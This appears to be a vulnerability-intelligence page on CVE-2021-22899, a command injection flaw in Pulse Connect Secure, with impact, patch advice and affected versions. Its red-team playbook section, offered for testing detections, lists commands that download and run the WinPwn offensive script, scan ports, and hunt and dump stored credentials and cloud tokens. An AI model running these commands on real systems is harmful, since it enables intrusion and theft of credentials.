CVE-2021-22899
Overview
This vulnerability is a command injection flaw rooted in improper input validation within the Windows Resource Profiles feature of Pulse Connect Secure. Specifically, the affected component fails to sanitize user-supplied input, allowing crafted commands to be executed on the underlying operating system. The flaw exists in versions prior to 9.1R11.4 of the product, enabling injection through parameters processed by the Windows Resource Profiles functionality.
Vulnerability Description
A command injection vulnerability exists in Pulse Connect Secure before 9.1R11.4 allows a remote authenticated attacker to perform remote code execution via Windows Resource Profiles Feature
Impact
An attacker with valid credentials but limited privileges can execute arbitrary commands on the Pulse Connect Secure server, potentially gaining full control over the system. This enables unauthorized access to sensitive data, manipulation of system configurations, or deployment of persistent malware. The breach of the VPN gateway can facilitate lateral movement within the internal network, leading to broader compromise and disruption of secure remote access services.
Solution
Ivanti has released security updates addressing this vulnerability in Pulse Connect Secure version 9.1R11.4 and later. Administrators should apply these patches promptly as detailed in advisory SA44784 available at https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784. No alternative mitigations are specified, so upgrading to the fixed version is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A command injection vulnerability has been identified in Pulse Connect Secure, specifically affecting versions prior to 9.1R11.4. This flaw allows a remote authenticated attacker to execute arbitrary commands on the underlying operating system through the Windows Resource Profiles feature. The vulnerability arises from improper validation of user-supplied input, which can be manipulated to inject malicious commands. When exploited, this vulnerability can lead to remote code execution, granting attackers the ability to execute commands with the same privileges as the application, potentially compromising the entire system.
The attack vector for this vulnerability primarily involves authenticated users who can interact with the Windows Resource Profiles feature. An attacker could leverage this access to craft a specially designed request that includes malicious command sequences. Once the request is processed by the application, the injected commands would be executed by the system, allowing the attacker to gain control over the server. Scenarios may include an attacker using stolen credentials or exploiting weak authentication mechanisms to gain access, thereby increasing the risk of exploitation significantly. This highlights the importance of robust authentication practices and user access controls to mitigate potential threats.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on Pulse Connect Secure for secure remote access. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, or even lateral movement within the network, allowing attackers to target additional systems. The business risks associated with such an incident include financial losses, reputational damage, and potential regulatory penalties, especially if sensitive customer data is compromised. Organizations could face significant recovery costs, including incident response, system remediation, and legal fees, further emphasizing the critical nature of addressing this vulnerability promptly.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching systems to the latest version of Pulse Connect Secure is essential to eliminate known vulnerabilities. Additionally, organizations should conduct routine security assessments and penetration testing to identify potential weaknesses in their configurations and access controls. Monitoring logs for unusual activity, particularly around the Windows Resource Profiles feature, can help detect exploitation attempts. Furthermore, employing a robust web application firewall (WAF) can provide an additional layer of protection by filtering and monitoring HTTP requests to identify and block malicious payloads.
In conclusion, the command injection vulnerability in Pulse Connect Secure poses a significant risk to organizations utilizing this software for remote access. The potential for remote code execution highlights the need for stringent security measures, including timely updates, thorough access controls, and continuous monitoring. By adopting a proactive security posture and implementing comprehensive detection and mitigation strategies, organizations can effectively reduce their exposure to this and similar vulnerabilities, safeguarding their systems and sensitive data from malicious actors.
Recent CSURFACE threat intelligence indicates a measurable increase in the Exploit Prediction Scoring System (EPSS) for CVE-2021-22899, rising by nearly 23%. This upward adjustment reflects a growing likelihood of exploitation attempts in the wild, despite the absence of newly reported exploit variants or ransomware associations. Our telemetry shows a sustained upward trend in exploitation risk, underscoring that threat actors are increasingly prioritizing this vulnerability within Pulse Connect Secure environments. While no direct evidence of active exploitation campaigns has emerged, the heightened EPSS score signals that adversaries may be probing or preparing to leverage this command injection flaw more aggressively. Consequently, the risk posture for organizations running affected versions has intensified, warranting elevated vigilance. This shift in the threat landscape suggests that defenders should anticipate a greater probability of targeted attacks exploiting this vulnerability, reinforcing its status as a high-severity concern within remote access infrastructure.
Affected Products (41)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r1.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r2.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r2.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.5:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r4:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r4.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r4.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r5.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r6.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:rx:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:-:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r1:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-22899 |
| kb.pulsesecure.net |
GitHub CVE
x_refsource_MISC
|
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/?kA23Z000000boUWSAY |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-22899 |